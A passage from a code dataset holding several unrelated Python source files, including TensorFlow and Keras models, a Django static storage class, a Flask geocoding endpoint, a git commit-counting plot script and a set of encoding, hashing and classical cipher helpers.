pre_dim):\n mid_layer = tf.layers.dense(layer, dim,\n activation=tf.nn.relu,\n kernel_initializer=tf.contrib.keras.initializers.glorot_uniform())\n # add wavelet:\n layer, eval_value = wavelet(mid_layer)\n output = tf.layers.dense(layer, 1, kernel_initializer=tf.contrib.keras.initializers.glorot_uniform())\n\n return output, eval_value\n\n\n# main function:\n# test on minist:\ndef main():\n learning_rate = 0.01\n batch_size = 30\n\n # data preparation\n data_range = 1000 # predict a data of range 1000\n data_num = 500\n # training_epochs = 850\n training_epochs = 1000\n look_back = 2 # using 2 previous x\n y_look_back = 3 # using 3 previous y\n timesteps = data_range - y_look_back # time steps\n\n # data prepared:\n # define model:\n # expected data format:(batch_size, time_steps, data_dim)\n\n X = tf.placeholder(tf.float32, [batch_size, timesteps, look_back+y_look_back])\n Y = tf.placeholder(tf.float32, [batch_size, timesteps, 1])\n\n outputs, eval_value = predict_model(X)\n\n loss = tf.nn.l2_loss((Y - outputs))\n opt = tf.train.AdagradOptimizer(learning_rate=learning_rate, initial_accumulator_value=1e-6)\n train_op = opt.minimize(loss)\n\n # saver define:\n # save the parameters:\n param_list = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES)\n saver = tf.train.Saver(param_list)\n print(param_list)\n # start training:\n init = tf.global_variables_initializer()\n\n # data preparation:\n dataX, dataY, original_X = prepare_pre_train_data(num=data_num,\n data_range=data_range,\n look_back=look_back,\n noise_level=0)\n val_dataX, val_dataY, val_original_X = prepare_pre_train_data(num=batch_size,\n data_range=data_range,\n look_back=look_back,\n noise_level=0)\n\n with tf.Session() as sess:\n sess.run(init)\n # global step\n step = 0\n # print('init value is {}'.format(sess.run(eval_value)))\n while(step < training_epochs):\n for i in range(int((1.0*data_num)/batch_size)):\n datax = dataX[i*batch_size:(i+1)*batch_size]\n datay = dataY[i * batch_size:(i + 1) * batch_size]\n # dynamic data generating:\n _, r_loss, pred = sess.run([train_op, loss, outputs], feed_dict={\n X: datax,\n Y: datay\n })\n\n # after training one epoch: exam the validation set:\n val_loss, pred = sess.run([loss, outputs], feed_dict={\n X: val_dataX,\n Y: val_dataY\n })\n print('training is {}|validation: {}| step: {}'.format(r_loss, val_loss, step))\n step += 1\n\n # save:\n saver.save(sess, 'train_log/pre_WRNN_v2')\n\n # see the result:\n plt.plot(pred[0] - val_dataY[0], label='error')\n plt.legend(loc='upper right')\n plt.show()\n\n\nif __name__ == '__main__':\n main()","sub_path":"pre_WRNN_v2.py","file_name":"pre_WRNN_v2.py","file_ext":"py","file_size_in_byte":3724,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"178465190","text":"# -*- coding: utf-8 -*-\n\nimport os\nimport json\n\nfrom django.contrib.staticfiles.storage import StaticFilesStorage\nfrom django.conf import settings\nfrom django.core.exceptions import ImproperlyConfigured\n\n\nclass WebpackHashStorage(StaticFilesStorage):\n \"\"\"\n Simple StaticFilesStorage based class that can be used together with the assets-webpack-plugin to include\n hashed files.\n The WEBPACK_ASSETS_FILE setting must be set and point to a valid json file.\n In the templates, entry point assets can then be referenced with their webpack name plus the appropriate suffix -\n e.g. with {% static 'entry1.js' %}\n \"\"\"\n\n def __init__(self, assets_file=None, *args, **kwargs):\n # check if assets file present\n if assets_file is None:\n self.assets_file = settings.WEBPACK_ASSETS_FILE\n self.check_assets()\n self.load_json()\n super(WebpackHashStorage, self).__init__(*args, **kwargs)\n\n def check_assets(self):\n \"\"\"\n Throws an exception if assets file is not configured or cannot be found.\n :param assets: path to the assets file\n \"\"\"\n if not self.assets_file:\n raise ImproperlyConfigured(\"You must specify the path to the assets.json file via WEBPACK_ASSETS_FILE\")\n elif not os.path.exists(self.assets_file):\n raise ImproperlyConfigured(\n \"The file `{file}` was not found, make sure \"\n \"to run the webpack build before the collectstatic command\".format(\n file=self.assets_file))\n\n def load_json(self):\n with open(self.assets_file) as json_file:\n self.assets = json.load(json_file)\n\n def _get_name_with_hash(self, name):\n asset_dir, asset_file = os.path.split(name)\n if asset_file in self.assets:\n return \"{}/{}\".format(asset_dir, self.assets.get(asset_file))\n return name\n\n def url(self, name):\n \"\"\"\n :param name: either the name of the webpack entry point (plus suffix like .js or .sourcemap) or the name of\n any other static file\n :return: path using the filename found in the assets.json file generated by webpack, if the name is not\n present in the json file, then the call is delegated to the super class.\n \"\"\"\n asset_type, file_path = os.path.split(name)\n if \"assets\" in asset_type:\n name = self._get_name_with_hash(name)\n return super(WebpackHashStorage, self).url(name)\n","sub_path":"vmmaster_frontend/storage.py","file_name":"storage.py","file_ext":"py","file_size_in_byte":2493,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"400855119","text":"\"\"\"\nExercise on Classes and Objects from Think Python Edition 2\n\nExercise 15.2\n\n\"\"\"\n\nimport turtle\n\nfrom Point import Point, Rectangle\nfrom Circle import Circle\n\nimport polygon\n\ndef draw_circle(t, circle):\n \"\"\"\n draws a circle\n \"\"\"\n t.pu()\n t.goto(circle.center.x, circle.center.y)\n t.fd(circle.radius)\n t.lt(90)\n t.pd()\n polygon.circle(t, circle.radius)\n\ndef draw_rect(t, rect):\n \"\"\"\n draws a rectangle\n \"\"\"\n t.pu()\n t.goto(rect.corner.x, rect.corner.y)\n t.setheading(0) # set orientation to east (90north;180 west;270 south)\n t.pd()\n\n for length in rect.width, rect.length, rect.width, rect.length:\n t.fd(length)\n t.rt(90)\n\n\nif __name__ == '__main__':\n bob = turtle.Turtle()\n\n #draw the axes\n length = 400\n bob.fd(length)\n bob.bk(length)\n bob.lt(90)\n bob.fd(length)\n bob.bk(length)\n\n #draw circle\n circle = Circle()\n circle.center = Point()\n circle.center.x = 150\n circle.center.y = 100\n circle.radius = 75\n\n draw_circle(bob, circle)\n\n #draw rectangle\n box = Rectangle()\n box.width = 100\n box.length = 200\n box.corner = Point()\n box.corner.x = 50\n box.corner.y = 50\n\n draw_rect(bob, box)\n\n #wait for user to close the windows\n turtle.mainloop()\n","sub_path":"draw.py","file_name":"draw.py","file_ext":"py","file_size_in_byte":1287,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"390586142","text":"\"\"\"\nComponents to gather data from a component or service.\n\"\"\"\n\nimport threading\nimport time\nfrom .service_info import DynamicServiceInfo\nfrom .component_details import DynamicComponentsDetails\nfrom .data_trigger import DataTrigger\n\n\nclass HealthMonitor(threading.Thread):\n \"\"\"\n Class responsible for periodically executing a particular function to\n get variable measurements, such as memory consumption.\n \"\"\"\n\n def __init__(self,\n periodicity: int,\n dynamic_component_details: DynamicComponentsDetails,\n data_trigger: DataTrigger,\n collect_func):\n threading.Thread.__init__(self)\n self.dynamic_component_details = dynamic_component_details\n self.data_trigger = data_trigger\n self.collect_func = collect_func\n self.periodicity = periodicity\n self.should_stop = False\n self.lock = threading.RLock()\n\n def run(self):\n \"\"\"\n Start retrieving monitor data\n \"\"\"\n self.lock.acquire()\n while self.should_stop is False:\n self.lock.release()\n self.dynamic_component_details.observed_value = self.collect_func(\n self.data_trigger)\n time.sleep(self.periodicity)\n self.lock.acquire()\n self.lock.release()\n\n def stop(self):\n \"\"\"\n Stop this monitor.\n\n Actually this will indicate that the thread should exit. It doesn't\n force the thread to be killed.\n \"\"\"\n self.lock.acquire()\n self.should_stop = True\n self.lock.release()\n\n\nclass HealthChecker:\n \"\"\"\n Class responsible for starting and stopping monitors.\n \"\"\"\n\n def __init__(self, service_info: DynamicServiceInfo):\n self.service_info = service_info\n self.threads = []\n\n def create_monitor(self,\n component_details: DynamicComponentsDetails,\n collect_func=None,\n periodicity=None):\n \"\"\"\n Register a new monitor to be executed.\n\n If collect_func and periodicity are *both* set, then a new thread is\n started executing the function in a perioci way. If not, nothing happens\n and the returned DataTrigger object should be used whenever the observed\n value changes.\n\n :type component_details: DynamicComponentsDetails\n :param component_details: The component details object to be associated\n to the new monitor\n :type collect_func: (dataTrigger: DataTriger) => any\n :param collect_func: The function to be executed when getting the data\n :type periodicity: int\n :param periodicity: Time in seconds between each callback execution.\n \"\"\"\n monitor_id = f'{component_details.component_name}:{component_details.measurement_name}'\n if self.service_info.detail is None:\n self.service_info.detail = {}\n\n self.service_info.detail[monitor_id] = component_details\n data_trigger = DataTrigger(self.service_info, self.service_info.detail[monitor_id])\n if (collect_func is not None) and (periodicity is not None):\n # Start collect thread\n thr = HealthMonitor(\n periodicity, self.service_info.detail[monitor_id], data_trigger, collect_func)\n self.threads.append(thr)\n thr.start()\n return data_trigger\n\n def stop_monitor(self):\n \"\"\"\n Stop all monitors\n \"\"\"\n for thread in self.threads:\n thread.stop()\n","sub_path":"dojot/module/healthcheck/healthchecker.py","file_name":"healthchecker.py","file_ext":"py","file_size_in_byte":3556,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"483787449","text":"from flask import Flask, flash, redirect, render_template, request, session, abort, send_from_directory, jsonify, Response\nfrom flask_cors import CORS\nimport reverse_geocoder as rg\n\napp = Flask(__name__)\nCORS(app)\n\n\n@app.route('/geo-service')\ndef hello():\n lat = request.args.get('lat')\n long = request.args.get('long')\n if lat == None or long == None:\n return jsonify(error=\"Please provide lat & long information!\", result=\"failed\"), 400\n try:\n coordinates = (float(lat), float(long))\n results = rg.search(coordinates)\n return jsonify(data=results[0], result=\"sucess\"), 200\n except:\n return jsonify(error=\"Error getting the location details\", result=\"failed\"), 500\n\n\nif __name__ == '__main__':\n app.jinja_env.auto_reload = True\n app.config['TEMPLATES_AUTO_RELOAD'] = True\n app.config['PROPAGATE_EXCEPTIONS'] = True\n app.run(host=\"0.0.0.0\", port=5000)\n","sub_path":"geo-service/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":914,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"208228318","text":"\"\"\"Convenience class for calling rook preprocess\n\nExample usage:\n\nfrom tworaven_apps.R_services.preprocess_util import PreprocessUtil\nsrc_file = '/ravens_volume/test_data/185_baseball/TRAIN/dataset_TRAIN/tables/learningData.csv'\n\nputil = PreprocessUtil(src_file)\nif putil.has_error():\n print('error found: ', putil.get_error_message())\nelse:\n # Preprocess data as a python dict\n #\n print('preprocess data (python dict)', putil.get_preprocess_data())\n\n # Preprocess data as a JSON string\n #\n print('preprocess data (json string)', putil.get_preprocess_data_as_json())\n\n # Preprocess data as a JSON string indented 4 spaces\n #\n print('preprocess data (json string)', putil.get_preprocess_data_as_json(4))\n\n---\n10/2019 - Updated to use:\n - rook preprocess OR\n - tworavens-preprocess via pypi: https://pypi.org/project/tworavens-preprocess/\n\n\"\"\"\nfrom os.path import isfile\nimport requests\n\n# source: https://pypi.org/project/tworavens-preprocess/\nfrom raven_preprocess.preprocess_runner import PreprocessRunner\n\nfrom tworaven_apps.data_prep_utils.duplicate_column_remover import DuplicateColumnRemover\nfrom tworaven_apps.utils.basic_err_check import BasicErrCheck\nfrom tworaven_apps.utils.json_helper import json_dumps, json_loads\n\n\n\nclass PreprocessUtil(BasicErrCheck):\n \"\"\"Convenience class for rook preprocess\"\"\"\n def __init__(self, source_path, **kwargs):\n \"\"\"Takes a path to a data file and runs preprocess\n\n - datastub - a unique directory that rookpreprocess uses to write\n - use_python_preprocess - boolean, default False.\n - use python package for preprocessing.\n \"\"\"\n self.source_path = source_path\n\n # R preprocess specific value\n self.datastub = kwargs.get('datastub', None)\n self.vars = kwargs.get('variables')\n\n # Flag - should python preprocess be used\n self.use_python_preprocess = kwargs.get('use_python_preprocess', True)\n\n # Option to read 1st line of file and fix duplicate columns names\n #\n self.fix_duplicate_columns = kwargs.get('fix_duplicate_columns', True)\n\n self.rook_app_info = None\n self.preprocess_data = None\n\n self.column_names = None\n\n self.run_preprocess()\n\n\n def get_preprocess_data_as_json(self, indent=None):\n \"\"\"Return the preprocess data as a JSON string\"\"\"\n assert not self.has_error(),\\\n 'Make sure \"has_error()\" is False before calling this method'\n\n json_str_info = json_dumps(self.preprocess_data,\n indent=indent)\n if json_str_info.success:\n return json_str_info.result_obj\n\n # SHOULDN'T HAPPEN!\n return json_str_info.err_msg\n\n def get_preprocess_data(self):\n \"\"\"Return the preprocess data as a python dict\"\"\"\n\n assert not self.has_error(),\\\n 'Make sure \"has_error()\" is False before calling this method'\n return self.preprocess_data\n\n def get_call_data(self):\n \"\"\"Format data for rook call\"\"\"\n if self.has_error():\n return None\n\n info = dict(data=self.source_path,\n datastub=self.datastub)\n\n if self.column_names:\n info['columns'] = self.column_names\n\n json_str_info = json_dumps(info)\n if json_str_info.success:\n return info\n\n # Failed JSON string conversion\n #\n self.add_error_message(json_str_info.err_msg)\n return None\n\n\n def run_preprocess(self):\n \"\"\"Run preprocess steps\"\"\"\n if self.has_error():\n return\n\n # Make sure file exists\n #\n if not (self.source_path and isfile(self.source_path)):\n self.add_error_message('File not found: %s' % self.source_path)\n return\n\n # Fix duplicate columns\n #\n if self.fix_duplicate_columns:\n dcr = DuplicateColumnRemover(self.source_path)\n self.column_names = dcr.updated_columns\n\n self.column_names = [requests.utils.quote(column) for column in self.column_names]\n\n if dcr.has_error():\n user_msg = (f'Augment error during column checks: '\n f'{dcr.get_error_message()}')\n self.add_error_message(user_msg)\n return\n\n # https://pypi.org/project/tworavens-preprocess/\n #\n run_info = PreprocessRunner.load_from_file(self.source_path, user_vars=self.vars)\n\n if not run_info.success:\n self.add_err_msg(run_info.err_msg)\n print('preprocess failed')\n print(run_info)\n return\n\n runner = run_info.result_obj\n\n # retrieve the data as a python OrderedDict\n #\n self.preprocess_data = runner.get_final_dict()\n\n\n\"\"\"\nfrom tworaven_apps.R_services.preprocess_util import PreprocessUtil\nsrc_file = '/ravens_volume/test_data/185_baseball/TRAIN/dataset_TRAIN/tables/learningData.csv'\n\n\n\"\"\"\n","sub_path":"tworaven_apps/R_services/preprocess_util.py","file_name":"preprocess_util.py","file_ext":"py","file_size_in_byte":4994,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"395940435","text":"import numpy as np\nimport tensorflow as tf\nfrom tensorflow import keras\nimport matplotlib.pyplot as plt\n\n\nimport tensorflow.keras.layers as layers\n# from tensorflow.keras.layers import Dense, Activation,Dropout, Flatten,MaxPooling1D\nfrom tensorflow.keras.layers import Dense, Embedding, Dropout, Activation,Flatten, Conv1D, GlobalMaxPooling1D,Dropout\nimport datasets\n\nfrom tensorflow.keras.preprocessing.sequence import pad_sequences\nimport setting\nimport pickle\n\n# # test\n# num_features = 3000\n# sequence_length = 300\n# embedding_dimension = 100\n# (x_train, y_train), (x_test, y_test) = keras.datasets.imdb.load_data(num_words=num_features)\n# print(x_train)\n# print(x_train.shape)\n# print(len(x_train[0]))\n# x_train = pad_sequences(x_train, maxlen=sequence_length)\n# x_test = pad_sequences(x_test, maxlen=sequence_length)\n# print(x_train)\n# print(x_train.shape)\n# print(len(x_train[0]))\n# exit()\n\n\n\n\n\n\n#param\n\n\n\n\n\n\n\n# # datasets\n# # trainX,testX,trainY,testY\n# for x1 in datasets.trainX[:5]:\n# # print(x1)\n# print(len(x1))\n# # print(len(datasets.trainX))\n# # print(len(datasets.testX))\n# print(datasets.trainX)\n# print(datasets.trainY)\n# print(datasets.trainX.shape)\n# print(len(datasets.trainX[0]))\n# print(len(datasets.trainX[2]))\n# print(datasets.trainX[0])\n# print(datasets.trainX[2])\n\n# for x in datasets.trainY:print(x)\n\n\n# exit()\n\n\n\n####### tf model process ########\ndef CNN():\n # model parameters:\n nb_words =len(datasets.tokenizer.word_index)+1\n embedding_dims = setting.embedding_dims\n cnn_filters = 100\n cnn_kernel_size = 5\n dense_hidden_dims = 200\n maxlen =setting.maxlen\n print('Build model...')\n model = tf.keras.Sequential()\n model.add(layers.Embedding(nb_words,embedding_dims,input_length=maxlen))\n model.add(layers.Dropout(0.5))\n model.add(layers.Conv1D(cnn_filters, cnn_kernel_size,padding='valid', activation='relu'))\n model.add(layers.GlobalMaxPooling1D())\n model.add(layers.Dense(dense_hidden_dims))\n model.add(layers.Dropout(0.5))\n model.add(layers.Dense(64,activation='relu'))\n model.add(layers.Dense(1))\n model.add(layers.Dense(setting.class_length,activation='sigmoid'))\n return model\n\ndef FastText():\n maxlen =setting.maxlen\n embedding_dims = setting.embedding_dims\n max_features = len(datasets.tokenizer.word_index)+1\n model = tf.keras.Sequential()\n model.add(layers.Embedding(max_features,embedding_dims,input_length=maxlen))\n model.add(layers.GlobalAveragePooling1D())\n model.add(layers.Dense(setting.class_length, activation='sigmoid'))\n return model\n\ndef RNN():\n max_features = len(datasets.tokenizer.word_index)+1\n embedding_dims = setting.embedding_dims\n # embedding_dims_2 = 30\n \n model = tf.keras.Sequential()\n model.add(layers.Embedding(max_features,embedding_dims))\n model.add(layers.Bidirectional(layers.LSTM(embedding_dims)))\n # model.add(layers.Bidirectional(layers.LSTM(embedding_dims,return_sequences=True)))\n # model.add(layers.Bidirectional(layers.LSTM(20)))\n model.add(layers.Dense(10, activation='relu'))\n model.add(layers.Dense(setting.class_length, activation='sigmoid'))\n return model\n\n\n\n\n\n\n# tfModel = FastText() #0.9683\n# tfModel = CNN()\ntfModel = RNN() #0.9874 #0.9992 \n\ntfModel.compile(optimizer='adam',loss='binary_crossentropy',metrics=['accuracy'])\n\n# train\nhistory1 = tfModel.fit(datasets.trainX,datasets.trainY,\n epochs=setting.train_epochs,\n # validation_data=[],\n # verbose=1\n batch_size=100,\n )\n\n\n#evaluate\n# print(len(datasets.testX))\n# print(datasets.testY)\nresults = tfModel.evaluate(datasets.testX,datasets.testY,verbose=0)\nprint(results)\n\n#\nfor name, value in zip(tfModel.metrics_names, results):\n print(\"%s: %.3f\" % (name, value))\n\n\n#plot \ndef plot_graphs(history, name):\n plt.plot(history.history[name])\n # plt.plot(history.history['validation'+ name])\n # plt.xlabel(\"Epochs\")\n # plt.ylabel(name)\n # plt.legend([name, 'validation - ' + name])\n plt.show()\n\n\ndef modelsave(configpath):\n # saving\n with open(configpath+'/tokenizer.pickle', 'wb') as handle:\n pickle.dump(datasets.tokenizer, handle, protocol=pickle.HIGHEST_PROTOCOL)\n\n tf.keras.models.save_model(tfModel, configpath+\"/model.h5\", save_format=\"h5\")\n\n with open(configpath+\"/config.file\", \"wb\") as f:\n pickle.dump({'categories':setting.categories,'maxlen':setting.maxlen}, f)\n\n# plot_graphs(history1, 'accuracy')\nmodelsave('./modelconfigsave')\n","sub_path":"classification/patient/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":4460,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"647397126","text":"from modax.training.losses.utils import precision, normal_LL\nfrom modax.linear_model.SBL import SBL\nimport jax.numpy as jnp\nimport jax\n\n\ndef BIC(prediction, y, u_t, theta, alpha, alpha_threshold=1e4):\n n_samples = theta.shape[0]\n\n # MSE part\n mse = jnp.mean((prediction - y) ** 2)\n\n # Reg part\n mask = alpha < alpha_threshold\n coeffs, reg = jax.lax.cond(jnp.sum(mask) == 0, lambda x: jnp.linalg.lstsq(theta, u_t)[:2], lambda x: jnp.linalg.lstsq(theta * jnp.where(x == 0, 1e-6, 1.0), u_t)[:2], mask)\n reg = reg / n_samples\n coeffs = coeffs.squeeze() * mask\n\n # BIC\n BIC = n_samples * (jnp.log(mse) + jnp.log(reg)) + jnp.log(n_samples) * jnp.sum(mask)\n\n return (\n BIC.squeeze(),\n (mse.squeeze(), reg.squeeze()),\n coeffs,\n )\n\n\ndef loss_fn_SBL(params, state, model, X, y, warm_restart=True):\n model_state, loss_state = state\n variables = {\"params\": params, **model_state}\n (prediction, dt, theta, coeffs), updated_model_state = model.apply(\n variables, X, mutable=list(model_state.keys())\n )\n\n n_samples, n_features = theta.shape\n\n # MSE stuff\n tau = precision(y, prediction, 0.0, 0.0)\n p_mse, MSE = normal_LL(prediction, y, tau)\n\n # Regression stuff\n # we dont want the gradient\n beta_prior = (\n n_samples / 2,\n n_samples / (jax.lax.stop_gradient(tau)),\n )\n\n if warm_restart:\n prior_init = loss_state[\"prior_init\"]\n else:\n prior_init = None\n\n p_reg, mn, prior, fwd_metric = SBL(\n theta,\n dt,\n prior_init=prior_init,\n hyper_prior=((1e-6, 1e-6), beta_prior),\n tol=1e-4,\n max_iter=300,\n )\n reg = jnp.mean((dt - jnp.dot(theta, coeffs)) ** 2)\n BIC_val, (mse, masked_reg), masked_coeffs = BIC(\n prediction, y, dt, theta, prior[:-1], 1e4\n )\n updated_loss_state = {\"prior_init\": prior}\n loss = -(p_mse + p_reg)\n metrics = {\n \"loss\": loss,\n \"p_mse\": p_mse,\n \"mse\": mse,\n \"p_reg\": p_reg,\n \"coeffs\": coeffs,\n \"reg\": reg,\n \"masked_reg\": masked_reg,\n \"bayes_coeffs\": mn,\n \"masked_coeffs\": masked_coeffs,\n \"alpha\": prior[:-1],\n \"beta\": prior[-1],\n \"tau\": tau,\n \"its\": fwd_metric[0],\n \"BIC\": BIC_val,\n }\n\n return (\n loss,\n (\n (updated_model_state, updated_loss_state),\n metrics,\n (prediction, dt, theta, mn),\n ),\n )\n","sub_path":"src/modax/training/losses/.ipynb_checkpoints/SBL-checkpoint.py","file_name":"SBL-checkpoint.py","file_ext":"py","file_size_in_byte":2466,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"571424353","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n'''format: \n \n python filename version number cumulative or not.\n \n example :python homework1.py v4.4 10 --c=c\n'''\n\nimport matplotlib.pyplot as plt\n\nimport re, sys\nfrom subprocess import Popen, DEVNULL, PIPE\nfrom argparse import ArgumentParser\n\nclass ContentException(BaseException):\n def __str__(self):\n error = 'Please check if the argument is appropriate.'\n return error\n \nclass GetGitLog:\n def __init__(self):\n # Set the arguments required for the class.\n parser = ArgumentParser(description=\"parse\")\n parser.add_argument('revision', help='the vision we want to count.')\n parser.add_argument('rev_range', type=str, help='how many sublevels we want to count')\n parser.add_argument('-c', '--cumulative', type=str, help='whether we chose cumulative or not.')\n args = parser.parse_args()\n self.basetime = 1452466892\n #Passing arguments in a class\n self.rev = args.revision\n try:\n rev_range = int(args.rev_range)\n except (ValueError, UnboundLocalError):\n err = 'Please let -r be a integer.'\n print(err)\n if args.cumulative == \"c\":\n cumulative = 1\n else:\n cumulative = 0\n print(\"Dont know what you mean with %s\" % args.cumulative)\n sys.exit(-1)\n \n \n self.get_log(cumulative, rev_range)\n \n \n \n \n def get_commit_cnt(self, git_cmd):\n try:\n raw_counts = git_cmd.communicate()[0]\n if raw_counts == 0:\n raise ContentException\n except ContentException as err:\n print(err)\n sys.exit(2)\n # if we request something that does not exist -> 0\n else:\n cnt = re.findall('[0-9]*-[0-9]*-[0-9]*', str(raw_counts))\n return len(cnt)\n\n def get_tag_days(self, git_cmd, base):\n try:\n seconds = git_cmd.communicate()[0]\n SecPerHour = 3600\n if seconds == 0:\n raise ContentException\n except ContentException as err:\n print(err)\n sys.exit(2)\n return (int(seconds)-base)//SecPerHour\n \n def get_log(self, cumulative, rev_range):\n # setup and fill in the table\n #print(\"#sublevel commits %s stable fixes\" % self.rev)\n #print(\"lv hour bugs\") #tag for R data.frame\n rev1 = self.rev\n \n # base time of v4.1 and v4.4 as ref base\n # fix this to extract the time of the base commit from git !\n # hofrat@Debian:~/git/linux-stable$ git log -1 --pretty=format:\"%ct\" v4.4\n # 1452466892\n #\n self.sublevels ,self.release_days,self.commits =[],[],[]\n for sl in range(1,rev_range+1):\n rev2 = self.rev + \".\" + str(sl)\n gitcnt = \"git rev-list --pretty=format:\\\"%ai\\\" \" + rev1 + \"...\" + rev2\n gittag = \"git log -1 --pretty=format:\\\"%ct\\\" \" + rev2\n #print(gitcnt)\n git_rev_list = Popen(gitcnt, stdout=PIPE, stderr=DEVNULL, shell=True)# grap it\n #print(git_rev_list)\n commit_cnt = self.get_commit_cnt(git_rev_list)# grap it\n #print(commit_cnt)\n if cumulative == 0:\n rev1 = rev2\n # if get back 0 then its an invalid revision number\n #print(commit_cnt)\n if commit_cnt:\n git_tag_date = Popen(gittag, stdout=PIPE, stderr=DEVNULL, shell=True)# grap it\n days = self.get_tag_days(git_tag_date, self.basetime) # grap it\n #print(\"%d %d %d\" % (sl,days,commit_cnt))\n self.sublevels.append(sl) \n self.release_days.append(days) \n self.commits.append(commit_cnt)\n \n #self.collect.append((sl,days,commit_cnt))# colect them into list\n else:\n break\n def draw(self):\n self.commits = [self.commits[0]]+[self.commits[i]-self.commits[i-1] for i in range(1,len(self.commits))]\n print(self.sublevels,self.commits)\n plt.scatter(self.sublevels,self.commits,c ='red') \n plt.title(\"development of fixes over sublevel\") \n plt.ylabel(\"kernel sublevel stable release\") \n plt.xlabel(\"stable fix commits\") \n plt.savefig(\"1v4.4.png\") \n plt.show()\n plt.bar(self.sublevels,self.commits) \n plt.title(\"development of fixes over sublevel\") \n plt.ylabel(\"kernel sublevel stable release\") \n plt.xlabel(\"stable fix commits\") \n plt.savefig(\"2v4.4.png\")\n plt.show()\n plt.plot(self.sublevels,self.commits,linestyle = 'solid') \n plt.title(\"development of fixes over sublevel\") \n plt.ylabel(\"kernel sublevel stable release\") \n plt.xlabel(\"stable fix commits\") \n plt.savefig(\"3v4.4.png\")\n plt.show()\nif __name__ == '__main__':\n getlog = GetGitLog()\n getlog.draw()","sub_path":"homework2.py","file_name":"homework2.py","file_ext":"py","file_size_in_byte":4990,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"435186410","text":"# _ __ _ _\n# | | / _| | | (_)\n# ___ _ __ _ _ _ __ | |_ ___ | |_ _ _ _ __ ___| |_ _ ___ _ __ ___\n# / __| '__| | | | '_ \\| __/ _ \\ | _| | | | '_ \\ / __| __| |/ _ \\| '_ \\/ __|\n# | (__| | | |_| | |_) | || (_) | | | | |_| | | | | (__| |_| | (_) | | | \\__ \\\n# \\___|_| \\__, | .__/ \\__\\___/ |_| \\__,_|_| |_|\\___|\\__|_|\\___/|_| |_|___/\n# __/ | |\n# |___/|_| by fatnet\n\nimport base64 # importing lib to encode/decode base16/32/64\nimport hashlib # importing lib to encode hash-functions\nimport math # importing lib to get math.ceil function\nimport string # importing lib to get ascii letters string\n# libs to work with GUI correctly\nimport sys\nimport itertools\nfrom PyQt5 import uic\nfrom PyQt5.QtWidgets import QApplication, QWidget, QPushButton, QMainWindow\nfrom PyQt5.QtWidgets import QLabel, QLineEdit, QHBoxLayout, QInputDialog\nfrom CryptoTool.cryptotoolUI import Ui_CryptoTool\n\n\n# Debugged. Works Ok.\ndef base16_encrypt(s): # base16 cipher encrypt function\n return base64.b16encode(str.encode(s)).decode()\n\n\n# Debugged. Works Ok.\ndef base16_decrypt(s): # base16 cipher decrypt function\n return base64.b16decode(s).decode()\n\n\n# Debugged. Works Ok.\ndef base32_encrypt(s): # base32 cipher encrypt function\n return base64.b32encode(str.encode(s)).decode()\n\n\n# Debugged. Works Ok.\ndef base32_decrypt(s): # base32 cipher decrypt function\n return base64.b32decode(str.encode(s)).decode()\n\n\n# Debugged. Works Ok.\ndef base64_encrypt(s): # base64 cipher encrypt function\n return base64.b64encode(str.encode(s)).decode()\n\n\n# Debugged. Works Ok.\ndef base64_decrypt(s): # base64 cipher decrypt function\n return base64.b64decode(str.encode(s)).decode()\n\n\n# Debugged. Works Ok.\ndef sha512(s): # sha512 string to hash function\n h = hashlib.sha512()\n h.update(bytes(s, encoding=\"utf-8\"))\n return h.hexdigest()\n\n\n# Debugged. Works Ok.\ndef sha384(s): # sha384 string to hash function\n h = hashlib.sha384()\n h.update(bytes(s, encoding=\"utf-8\"))\n return h.hexdigest()\n\n\n# Debugged. Works Ok.\ndef sha256(s): # sha256 string to hash function\n h = hashlib.sha256()\n h.update(bytes(s, encoding=\"utf-8\"))\n return h.hexdigest()\n\n\n# Debugged. Works Ok.\ndef sha224(s): # sha224 string to hash function\n h = hashlib.sha224()\n h.update(bytes(s, encoding=\"utf-8\"))\n return h.hexdigest()\n\n\n# Debugged. Works Ok.\ndef sha1(s): # sha1 string to hash function\n h = hashlib.sha1()\n h.update(bytes(s, encoding=\"utf-8\"))\n return h.hexdigest()\n\n\n# Debugged. Works Ok.\ndef md5(s): # md5 string to hash function\n h = hashlib.md5()\n h.update(bytes(s, encoding=\"utf-8\"))\n return h.hexdigest()\n\n\n# Debugged. Works Ok.\ndef hex_encrypt(s): # hex cipher encrypt function\n return ''.join([str(hex(ord(c)))[2:] for c in s])\n\n\n# Debugged. Works Ok.\ndef hex_decrypt(s): # hex cipher decrypt function\n return str(bytes.fromhex(s))[2:-1]\n\n\n# Debugged. Works Ok.\ndef caesar_encrypt(s, key): # caesar cipher encrypt function\n key = int(key)\n chars = string.ascii_lowercase # not stepped alphabet\n key_chars = chars[key % 26:] + chars[:key % 26] # getting alphabet stepped with key\n table = s.maketrans(chars, key_chars) # making a table using the maketrans method\n return s.translate(table) # returning str(table)\n\n\n# Debugged. Works Ok.\ndef caesar_decrypt(s, key): # caesar cipher decrypt function\n return caesar_encrypt(s, (26 - int(key)) % 26)\n # caesar cipher decode function with key is similar to caesar cipher encode function with key=26-(key%26)\n\n\n# Debugged. Works Ok.\ndef rot13_decrypt(s): # rot13 cipher decrypt function\n return caesar_decrypt(s, -13)\n # rot13 cipher is similar to caesar with key 13\n\n\n# Debugged. Works Ok.\ndef rot13_encrypt(s): # rot13 cipher encrypt function\n return caesar_encrypt(s, 13)\n # rot13 cipher is similar to caesar with key 13\n\n\n# Debugged. Works Ok.\ndef vigenere_encrypt(s, key): # vigenere cipher encrypt function\n k = key * (len(s) // len(key) + 1) # making key len 